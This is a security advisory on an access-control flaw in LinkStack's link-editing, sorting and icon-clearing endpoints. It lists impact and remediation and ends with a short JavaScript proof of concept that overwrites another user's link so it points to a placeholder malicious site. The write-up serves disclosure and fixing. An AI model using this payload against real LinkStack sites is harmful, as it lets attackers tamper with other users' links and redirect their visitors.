# Vulnerability Summary ## Overview LinkStack's link management endpoints (`/studio/edit-link`, `/studio/sort-link`, `/clearIcon`) accept user-supplied link IDs but fail to verify whether the currently logged-in user is the owner of that link. This allows any authenticated user to modify or delete other users' links. ## Impact Scope - **Affected Endpoints**: - `POST /studio/edit-link` - `POST /studio/sort-link` - `GET /clearIcon/{id}` - **Consequences**: - Unauthorized modification of other users' links (e.g., title, type, button text, etc.). - Unauthorized deletion of other users' link icons. - Potential data tampering or denial of service. ## Remediation 1. **`/studio/edit-link`**: Implement an ownership check; return a 403 status if the link does not belong to the current user. 2. **`/studio/sort-link`**: Add a `user_id` condition to the `WHERE` clause to ensure only the current user's links are updated. 3. **`/clearIcon/{id}`**: Add middleware to verify link ownership before executing the deletion operation. ## POC Code ```javascript fetch('/studio/edit-link', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'X-CSRF-TOKEN': document.querySelector('meta[name="csrf-token"]').content }, body: new URLSearchParams({ linkid: '+USER_B_LINK_ID+', link: 'https://evil-site.com', title: 'Modified', typeenum: 'link', button: 'custom_website' }) }).then(r => console.log('Status:', r.status)) ``` > Note: `USER_B_LINK_ID` refers to another user's link ID. Before the fix, the request succeeds (returns 200); after the fix, it returns 403 Forbidden.